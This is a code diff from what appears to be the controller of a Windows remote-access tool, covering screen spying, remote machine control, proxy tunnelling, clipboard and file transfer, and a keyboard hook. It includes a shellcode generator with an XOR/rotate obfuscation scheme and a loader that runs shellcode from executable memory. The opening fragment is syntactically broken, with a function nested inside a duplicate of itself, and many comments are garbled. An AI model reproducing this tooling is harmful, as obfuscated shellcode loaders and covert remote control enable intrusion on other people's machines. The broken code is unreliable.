buf[i] = rol8(buf[i] ^ mask, 3); // <20><><EFBFBD><EFBFBD>+<2B><>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
state = state * 2654435761u + buf[i]; // LCG + <20><><EFBFBD><EFBFBD><EFBFBD>Ŷ<EFBFBD>
}
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
uint32_t state = seed;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed)
{
uint32_t state = seed;
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
uint8_t orig = buf[i];
buf[i] = ror8(buf[i], 3) ^ mask;
state = state * 2654435761u + orig; // <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD>ǰ<EFBFBD><C7B0>ԭ<EFBFBD>ֽڸ<D6BD><DAB8><EFBFBD> state
}
}
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
uint8_t orig = buf[i];
buf[i] = ror8(buf[i], 3) ^ mask;
state = state * 2654435761u + orig; // <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD>ǰ<EFBFBD><C7B0>ԭ<EFBFBD>ֽڸ<D6BD><DAB8><EFBFBD> state
}
}
};

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

371
server/2015Remote/2015RemoteDlg.cpp
View File

@@ -970,7 +970,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
AUTO_TICK(500);
CDialogEx::OnInitDialog();
int ret = InitFileUpload(GetHMAC());
g_hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, AfxGetInstanceHandle(), 0);
g_hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, AfxGetInstanceHandle(), 0);
m_GroupList = {"default"};
// Grid 容器
@@ -1133,11 +1133,13 @@ DWORD WINAPI CMy2015RemoteDlg::StartFrpClient(LPVOID param)
int usingFRP = 0;
#ifdef _WIN64
usingFRP = ip.empty() ? 0 : THIS_CFG.GetInt("frp", "UseFrp");
#else
CloseHandle(This->m_hFRPThread);
This->m_hFRPThread = NULL;
return 0x20250820;
#endif
if (!usingFRP) {
CloseHandle(This->m_hFRPThread);
This->m_hFRPThread = NULL;
return 0x20250820;
if (usingFRP) {
This->m_frpStatus = STATUS_RUN;
}
Mprintf("[FRP] Proxy thread start running\n");
@@ -2056,25 +2058,29 @@ std::string getDateStr(int daysOffset = 0)
return oss.str();
}
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size) {
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
if (!ctx->Send2Client(data, size)) {
return false;
}
return true;
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size)
{
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
if (!ctx->Send2Client(data, size)) {
return false;
}
return true;
}
void RecvData(void* ptr) {
void RecvData(void* ptr)
{
FileChunkPacket* pkt = (FileChunkPacket*)ptr;
}
void delay_cancel(CONTEXT_OBJECT* ctx, int sec) {
if (!ctx) return;
void delay_cancel(CONTEXT_OBJECT* ctx, int sec)
{
if (!ctx) return;
Sleep(sec*1000);
ctx->CancelIO();
ctx->CancelIO();
}
void FinishSend(void* user) {
void FinishSend(void* user)
{
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
// 需要等待客户端接收完成方可关闭
std::thread(delay_cancel, ctx, 15).detach();
@@ -2092,28 +2098,28 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
// 【L】主机上下线和授权
// 【x】对话框相关功能
switch (cmd) {
case COMMAND_GET_FILE: {
// 发送文件
auto files = GetClipboardFiles();
if (!files.empty()) {
std::string dir = (char*)(szBuffer + 1);
case COMMAND_GET_FILE: {
// 发送文件
auto files = GetClipboardFiles();
if (!files.empty()) {
std::string dir = (char*)(szBuffer + 1);
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
std::thread(FileBatchTransferWorker, files, dir, ContextObject, SendData, FinishSend,
hash, hmac).detach();
}
break;
}
case COMMAND_SEND_FILE: {
// 接收文件
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
std::thread(FileBatchTransferWorker, files, dir, ContextObject, SendData, FinishSend,
hash, hmac).detach();
}
break;
}
case COMMAND_SEND_FILE: {
// 接收文件
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
CONNECT_ADDRESS addr;
memcpy(addr.pwdHash, hash.c_str(), min(hash.length(), sizeof(addr.pwdHash)));
int n = RecvFileChunk((char*)szBuffer, len, &addr, RecvData, hash, hmac);
if (n) {
Mprintf("RecvFileChunk failed: %d. hash: %s, hmac: %s\n", n, hash.c_str(), hmac.c_str());
}
break;
}
int n = RecvFileChunk((char*)szBuffer, len, &addr, RecvData, hash, hmac);
if (n) {
Mprintf("RecvFileChunk failed: %d. hash: %s, hmac: %s\n", n, hash.c_str(), hmac.c_str());
}
break;
}
case TOKEN_GETVERSION: { // 获取版本【L】
// TODO 维持心跳
bool is64Bit = ContextObject->InDeCompressedBuffer.GetBYTE(1);
@@ -2433,7 +2439,8 @@ void CMy2015RemoteDlg::SendMasterSettings(CONTEXT_OBJECT* ctx)
}
}
bool isAllZeros(const BYTE* data, int len) {
bool isAllZeros(const BYTE* data, int len)
{
for (int i = 0; i < len; ++i)
if (data[i])
return false;
@@ -3056,7 +3063,7 @@ void CMy2015RemoteDlg::OnListClick(NMHDR* pNMHDR, LRESULT* pResult)
strText.Format(_T("文件路径: %s%s %s\r\n系统信息: %s 位 %s 核心 %s GB\r\n启动信息: %s %s %s%s\r\n上线信息: %s %d %s"),
res[RES_PROGRAM_BITS].IsEmpty() ? "" : res[RES_PROGRAM_BITS] + "", res[RES_FILE_PATH], res[RES_EXE_VERSION],
res[RES_SYSTEM_BITS], res[RES_SYSTEM_CPU], res[RES_SYSTEM_MEM], startTime, expired.c_str(),
res[RES_USERNAME], res[RES_ISADMIN] == "1" ? "[管理员]" : res[RES_ISADMIN].IsEmpty() ? "" : "[非管理员]",
res[RES_USERNAME], res[RES_ISADMIN] == "1" ? "[管理员]" : res[RES_ISADMIN].IsEmpty() ? "" : "[非管理员]",
ctx->GetProtocol().c_str(), ctx->GetServerPort(), typMap[type].c_str());
// 获取鼠标位置
@@ -3157,14 +3164,14 @@ void CMy2015RemoteDlg::OnToolInputPassword()
}
}
bool safe_exec(void *exec) {
__try {
((void(*)())exec)();
bool safe_exec(void *exec)
{
__try {
((void(*)())exec)();
return true;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
VirtualFree(exec, 0, MEM_RELEASE);
}
} __except (EXCEPTION_EXECUTE_HANDLER) {
VirtualFree(exec, 0, MEM_RELEASE);
}
return false;
}
@@ -3184,60 +3191,58 @@ int main() {
}
*/
#include "common/obfs.h"
void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = ".c") {
CFileDialog fileDlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
_T("DLL Files (*.dll)|*.dll|BIN Files (*.bin)|*.bin|All Files (*.*)|*.*||"), AfxGetMainWnd());
int ret = 0;
try {
ret = fileDlg.DoModal();
}
catch (...) {
AfxMessageBox("文件对话框未成功打开! 请稍后再试。", MB_ICONWARNING);
return;
}
if (ret == IDOK) {
CString name = fileDlg.GetPathName();
CFile File;
BOOL r = File.Open(name, CFile::typeBinary | CFile::modeRead);
if (!r) {
AfxMessageBox("文件打开失败! 请稍后再试。\r\n" + name, MB_ICONWARNING);
return;
}
int dwFileSize = File.GetLength();
LPBYTE szBuffer = new BYTE[dwFileSize];
File.Read(szBuffer, dwFileSize);
File.Close();
void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = ".c")
{
CFileDialog fileDlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
_T("DLL Files (*.dll)|*.dll|BIN Files (*.bin)|*.bin|All Files (*.*)|*.*||"), AfxGetMainWnd());
int ret = 0;
try {
ret = fileDlg.DoModal();
} catch (...) {
AfxMessageBox("文件对话框未成功打开! 请稍后再试。", MB_ICONWARNING);
return;
}
if (ret == IDOK) {
CString name = fileDlg.GetPathName();
CFile File;
BOOL r = File.Open(name, CFile::typeBinary | CFile::modeRead);
if (!r) {
AfxMessageBox("文件打开失败! 请稍后再试。\r\n" + name, MB_ICONWARNING);
return;
}
int dwFileSize = File.GetLength();
LPBYTE szBuffer = new BYTE[dwFileSize];
File.Read(szBuffer, dwFileSize);
File.Close();
LPBYTE srcData = NULL;
int srcLen = 0;
if (load){
LPBYTE srcData = NULL;
int srcLen = 0;
if (load) {
const uint32_t key = 0xDEADBEEF;
obfs->DeobfuscateBuffer(szBuffer, dwFileSize, key);
void* exec = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (exec) {
memcpy(exec, szBuffer, dwFileSize);
if (safe_exec(exec)) {
AfxMessageBox("Shellcode 执行成功! ", MB_ICONINFORMATION);
}
else {
void* exec = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (exec) {
memcpy(exec, szBuffer, dwFileSize);
if (safe_exec(exec)) {
AfxMessageBox("Shellcode 执行成功! ", MB_ICONINFORMATION);
} else {
AfxMessageBox("Shellcode 执行失败! 请用本程序生成的 bin 文件进行测试! ", MB_ICONERROR);
}
}
}
else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
TCHAR buffer[MAX_PATH];
_tcscpy_s(buffer, name);
PathRemoveExtension(buffer);
}
} else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
TCHAR buffer[MAX_PATH];
_tcscpy_s(buffer, name);
PathRemoveExtension(buffer);
const uint32_t key = 0xDEADBEEF;
obfs->ObfuscateBuffer(srcData, srcLen, key);
if (obfs->WriteFile(CString(buffer) + suffix, srcData, srcLen, "Shellcode")) {
AfxMessageBox("Shellcode 生成成功! 请自行编写调用程序。\r\n" + CString(buffer) + suffix,
MB_ICONINFORMATION);
}
}
SAFE_DELETE_ARRAY(srcData);
SAFE_DELETE_ARRAY(szBuffer);
}
if (obfs->WriteFile(CString(buffer) + suffix, srcData, srcLen, "Shellcode")) {
AfxMessageBox("Shellcode 生成成功! 请自行编写调用程序。\r\n" + CString(buffer) + suffix,
MB_ICONINFORMATION);
}
}
SAFE_DELETE_ARRAY(srcData);
SAFE_DELETE_ARRAY(szBuffer);
}
}
void CMy2015RemoteDlg::OnToolGenShellcode()
@@ -3255,36 +3260,36 @@ void CMy2015RemoteDlg::OnObfsShellcode()
void CMy2015RemoteDlg::OnToolGenShellcodeBin()
{
ObfsBase obfs(false);
shellcode_process(&obfs, false, ".bin");
ObfsBase obfs(false);
shellcode_process(&obfs, false, ".bin");
}
void CMy2015RemoteDlg::OnObfsShellcodeBin()
{
Obfs obfs(false);
shellcode_process(&obfs, false, ".bin");
Obfs obfs(false);
shellcode_process(&obfs, false, ".bin");
}
void CMy2015RemoteDlg::OnShellcodeLoadTest()
{
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
ObfsBase obfs;
shellcode_process(&obfs, true);
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
ObfsBase obfs;
shellcode_process(&obfs, true);
}
}
void CMy2015RemoteDlg::OnShellcodeObfsLoadTest()
{
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
Obfs obfs;
shellcode_process(&obfs, true);
}
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
Obfs obfs;
shellcode_process(&obfs, true);
}
}
void CMy2015RemoteDlg::OnOnlineAssignTo()
@@ -3504,18 +3509,19 @@ void CMy2015RemoteDlg::OnOnlineRegroup()
}
void CMy2015RemoteDlg::MachineManage(MachineCommand type) {
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
void CMy2015RemoteDlg::MachineManage(MachineCommand type)
{
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
BYTE token[32] = { TOKEN_MACHINE_MANAGE, type };
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
}
void CMy2015RemoteDlg::OnMachineLogout()
@@ -3550,73 +3556,76 @@ void CMy2015RemoteDlg::OnExecuteUpload()
void CMy2015RemoteDlg::OnDestroy()
{
if (g_hKeyboardHook)
{
UnhookWindowsHookEx(g_hKeyboardHook);
g_hKeyboardHook = NULL;
}
if (g_hKeyboardHook) {
UnhookWindowsHookEx(g_hKeyboardHook);
g_hKeyboardHook = NULL;
}
CDialogEx::OnDestroy();
}
CString GetClipboardText()
{
if (!OpenClipboard(nullptr)) return _T("");
if (!OpenClipboard(nullptr)) return _T("");
#ifdef UNICODE
HANDLE hData = GetClipboardData(CF_UNICODETEXT);
HANDLE hData = GetClipboardData(CF_UNICODETEXT);
#else
HANDLE hData = GetClipboardData(CF_TEXT);
HANDLE hData = GetClipboardData(CF_TEXT);
#endif
if (!hData) { CloseClipboard(); return _T(""); }
if (!hData) {
CloseClipboard();
return _T("");
}
#ifdef UNICODE
wchar_t* pszText = static_cast<wchar_t*>(GlobalLock(hData));
wchar_t* pszText = static_cast<wchar_t*>(GlobalLock(hData));
#else
char* pszText = static_cast<char*>(GlobalLock(hData));
char* pszText = static_cast<char*>(GlobalLock(hData));
#endif
CString strText = pszText ? pszText : _T("");
GlobalUnlock(hData);
CloseClipboard();
return strText;
CString strText = pszText ? pszText : _T("");
GlobalUnlock(hData);
CloseClipboard();
return strText;
}
void SetClipboardText(const CString& text)
{
if (!OpenClipboard(nullptr)) return;
EmptyClipboard();
if (!OpenClipboard(nullptr)) return;
EmptyClipboard();
#ifdef UNICODE
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(wchar_t));
wchar_t* p = static_cast<wchar_t*>(GlobalLock(hGlob));
if (p) wcscpy_s(p, text.GetLength() + 1, text);
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(wchar_t));
wchar_t* p = static_cast<wchar_t*>(GlobalLock(hGlob));
if (p) wcscpy_s(p, text.GetLength() + 1, text);
#else
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(char));
char* p = static_cast<char*>(GlobalLock(hGlob));
if (p) strcpy_s(p, text.GetLength() + 1, CT2A(text)); // CT2A 宏把 CString 转成 char*
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(char));
char* p = static_cast<char*>(GlobalLock(hGlob));
if (p) strcpy_s(p, text.GetLength() + 1, CT2A(text)); // CT2A 宏把 CString 转成 char*
#endif
GlobalUnlock(hGlob);
GlobalUnlock(hGlob);
#ifdef UNICODE
SetClipboardData(CF_UNICODETEXT, hGlob);
SetClipboardData(CF_UNICODETEXT, hGlob);
#else
SetClipboardData(CF_TEXT, hGlob);
SetClipboardData(CF_TEXT, hGlob);
#endif
CloseClipboard();
CloseClipboard();
}
CDialogBase* CMy2015RemoteDlg::GetRemoteWindow(HWND hWnd)
{
if (!::IsWindow(hWnd)) return FALSE;
if (!::IsWindow(hWnd)) return FALSE;
EnterCriticalSection(&m_cs);
auto find = m_RemoteWnds.find(hWnd);
auto ret = find == m_RemoteWnds.end() ? NULL : find->second;
auto ret = find == m_RemoteWnds.end() ? NULL : find->second;
LeaveCriticalSection(&m_cs);
return ret;
}
void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd) {
void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd)
{
EnterCriticalSection(&m_cs);
m_RemoteWnds.erase(wnd);
LeaveCriticalSection(&m_cs);
@@ -3624,48 +3633,41 @@ void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd) {
LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION)
{
if (nCode == HC_ACTION) {
do {
static CDialogBase* operateWnd = nullptr;
KBDLLHOOKSTRUCT* pKey = (KBDLLHOOKSTRUCT*)lParam;
// 只在按下时处理
if (wParam == WM_KEYDOWN)
{
if (wParam == WM_KEYDOWN) {
// 检测 Ctrl+C / Ctrl+X
if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && (pKey->vkCode == 'C' || pKey->vkCode == 'X')) {
HWND hFore = ::GetForegroundWindow();
operateWnd = g_2015RemoteDlg->GetRemoteWindow(hFore);
if (!operateWnd)
if (!operateWnd)
g_2015RemoteDlg->m_pActiveSession = nullptr;
}
// 检测 Ctrl+V
else if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && pKey->vkCode == 'V')
{
else if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && pKey->vkCode == 'V') {
HWND hFore = ::GetForegroundWindow();
CDialogBase* dlg = g_2015RemoteDlg->GetRemoteWindow(hFore);
if (dlg)
{
if (dlg) {
if (dlg == operateWnd)break;
auto screen = (CScreenSpyDlg*)dlg;
auto screen = (CScreenSpyDlg*)dlg;
if (!screen->m_bIsCtrl) {
Mprintf("【Ctrl+V】 [本地 -> 远程] 窗口不是控制状态: %s\n", screen->m_IPAddress);
break;
}
// [1] 本地 -> 远程
auto files = GetClipboardFiles();
if (!files.empty())
{
auto files = GetClipboardFiles();
if (!files.empty()) {
// 获取远程目录
BYTE szBuffer[100] = { COMMAND_GET_FOLDER };
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)szBuffer + 1, masterId.c_str(), masterId.length());
memcpy((char*)szBuffer + 1 + masterId.length(), hmac.c_str(), hmac.length());
dlg->m_ContextObject->Send2Client(szBuffer, sizeof(szBuffer));
}
else
{
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)szBuffer + 1, masterId.c_str(), masterId.length());
memcpy((char*)szBuffer + 1 + masterId.length(), hmac.c_str(), hmac.length());
dlg->m_ContextObject->Send2Client(szBuffer, sizeof(szBuffer));
} else {
CString strText = GetClipboardText();
if (!strText.IsEmpty()) {
BYTE* szBuffer = new BYTE[strText.GetLength() + 1];
@@ -3676,9 +3678,7 @@ LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam
SAFE_DELETE_ARRAY(szBuffer);
}
}
}
else if (g_2015RemoteDlg->m_pActiveSession && operateWnd)
{
} else if (g_2015RemoteDlg->m_pActiveSession && operateWnd) {
auto screen = (CScreenSpyDlg*)(g_2015RemoteDlg->m_pActiveSession);
if (!screen->m_bIsCtrl) {
Mprintf("【Ctrl+V】 [远程 -> 本地] 窗口不是控制状态: %s\n", screen->m_IPAddress);
@@ -3687,35 +3687,32 @@ LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam
// [2] 远程 -> 本地
BYTE bToken[100] = {COMMAND_SCREEN_GET_CLIPBOARD};
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)bToken + 1, masterId.c_str(), masterId.length());
memcpy((char*)bToken + 1 + masterId.length(), hmac.c_str(), hmac.length());
auto files = GetClipboardFiles();
if (!files.empty()) {
if (::OpenClipboard(nullptr))
{
EmptyClipboard();
CloseClipboard();
}
}
memcpy((char*)bToken + 1, masterId.c_str(), masterId.length());
memcpy((char*)bToken + 1 + masterId.length(), hmac.c_str(), hmac.length());
auto files = GetClipboardFiles();
if (!files.empty()) {
if (::OpenClipboard(nullptr)) {
EmptyClipboard();
CloseClipboard();
}
}
g_2015RemoteDlg->m_pActiveSession->m_ContextObject->Send2Client(bToken, sizeof(bToken));
Mprintf("【Ctrl+V】 从远程拷贝到本地 \n");
}
else
{
} else {
Mprintf("[Ctrl+V] 没有活动的远程桌面会话 \n");
}
}
}
} while (0);
}
}
// 允许消息继续传递
return CallNextHookEx(g_2015RemoteDlg->g_hKeyboardHook, nCode, wParam, lParam);
// 允许消息继续传递
return CallNextHookEx(g_2015RemoteDlg->g_hKeyboardHook, nCode, wParam, lParam);
}
LRESULT CMy2015RemoteDlg::OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam)
{
CDialogBase* pSession = reinterpret_cast<CDialogBase*>(wParam);
CDialogBase* pSession = reinterpret_cast<CDialogBase*>(wParam);
m_pActiveSession = pSession;
return 0;
return 0;
}

6
server/2015Remote/2015RemoteDlg.h
View File

@@ -235,8 +235,8 @@ public:
std::map<HWND, CDialogBase *> m_RemoteWnds;
CDialogBase* GetRemoteWindow(HWND hWnd);
void RemoveRemoteWindow(HWND wnd);
CDialogBase* m_pActiveSession = nullptr; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><E1BBB0><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8> / NULL <20><>ʾ<EFBFBD><CABE>
afx_msg LRESULT OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam);
CDialogBase* m_pActiveSession = nullptr; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><E1BBB0><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8> / NULL <20><>ʾ<EFBFBD><CABE>
afx_msg LRESULT OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam);
static LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
HHOOK g_hKeyboardHook = NULL;
enum {
@@ -246,7 +246,7 @@ public:
STATUS_EXIT = 2,
};
HANDLE m_hFRPThread = NULL;
int m_frpStatus = STATUS_RUN;
int m_frpStatus = STATUS_UNKNOWN;
static DWORD WINAPI StartFrpClient(LPVOID param);
void ApplyFrpSettings();
bool CheckValid(int trail = 14);

4
server/2015Remote/CPasswordDlg.cpp
View File

@@ -37,8 +37,8 @@ std::string GetHMAC(int offset)
{
const Validation * v= (Validation*)(g_MasterID + offset);
std::string hmac = v->Checksum;
if (hmac.empty())
hmac = THIS_CFG.GetStr("settings", "HMAC");
if (hmac.empty())
hmac = THIS_CFG.GetStr("settings", "HMAC");
return hmac;
}

72
server/2015Remote/ScreenSpyDlg.cpp
View File

@@ -39,17 +39,31 @@ IMPLEMENT_DYNAMIC(CScreenSpyDlg, CDialog)
#pragma comment(lib, "PrivateDesktop_Libx64.lib")
#endif
#else
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs) { return 0; }
int UninitFileUpload() { return 0; }
std::vector<std::string> GetClipboardFiles() { return{}; }
bool GetCurrentFolderPath(std::string& outDir) { return false; }
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac) {
finish(user);
return 0;
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs)
{
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac) {
return 0;
int UninitFileUpload()
{
return 0;
}
std::vector<std::string> GetClipboardFiles()
{
return{};
}
bool GetCurrentFolderPath(std::string& outDir)
{
return false;
}
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac)
{
finish(user);
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac)
{
return 0;
}
#endif
@@ -261,19 +275,19 @@ VOID CScreenSpyDlg::OnReceiveComplete()
{
assert (m_ContextObject);
auto cmd = m_ContextObject->InDeCompressedBuffer.GetBYTE(0);
LPBYTE szBuffer = m_ContextObject->InDeCompressedBuffer.GetBuffer();
unsigned len = m_ContextObject->InDeCompressedBuffer.GetBufferLen();
LPBYTE szBuffer = m_ContextObject->InDeCompressedBuffer.GetBuffer();
unsigned len = m_ContextObject->InDeCompressedBuffer.GetBufferLen();
switch(cmd) {
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
// 发送目录并准备接收文件
BYTE cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
m_ContextObject->Send2Client(cmd, sizeof(cmd));
}
break;
}
BYTE cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
m_ContextObject->Send2Client(cmd, sizeof(cmd));
}
break;
}
case TOKEN_FIRSTSCREEN: {
DrawFirstScreen();
break;
@@ -904,14 +918,14 @@ void CScreenSpyDlg::OnSize(UINT nType, int cx, int cy)
void CScreenSpyDlg::OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized)
{
CDialogBase::OnActivate(nState, pWndOther, bMinimized);
CDialogBase::OnActivate(nState, pWndOther, bMinimized);
CWnd* pMain = AfxGetMainWnd();
if (!pMain)
return;
CWnd* pMain = AfxGetMainWnd();
if (!pMain)
return;
if (nState != WA_INACTIVE){
// 通知主窗口:远程窗口获得焦点
::PostMessage(pMain->GetSafeHwnd(), WM_SESSION_ACTIVATED, (WPARAM)this, 0);
}
if (nState != WA_INACTIVE) {
// 通知主窗口:远程窗口获得焦点
::PostMessage(pMain->GetSafeHwnd(), WM_SESSION_ACTIVATED, (WPARAM)this, 0);
}
}

2
server/2015Remote/ScreenSpyDlg.h
View File

@@ -109,7 +109,7 @@ public:
afx_msg void OnMouseLeave();
afx_msg void OnKillFocus(CWnd* pNewWnd);
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized);
afx_msg void OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized);
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV ֧<><D6A7>

6
server/2015Remote/Server.h
View File

@@ -542,10 +542,10 @@ public:
{
return Parser.Parse(buf, CompressMethod, PeerName);
}
void Encode(PBYTE data, bool &flag) const
{
void Encode(PBYTE data, bool &flag) const
{
flag ? data[0] ^= 0x2B : 0x2B == 0x2B;
}
}
// Encode data before compress.
void Encode(PBYTE data, int len) const
{

BIN
server/2015Remote/res/frpc.dll
View File

Binary file not shown.

BIN
server/2015Remote/resource.h
View File

Binary file not shown.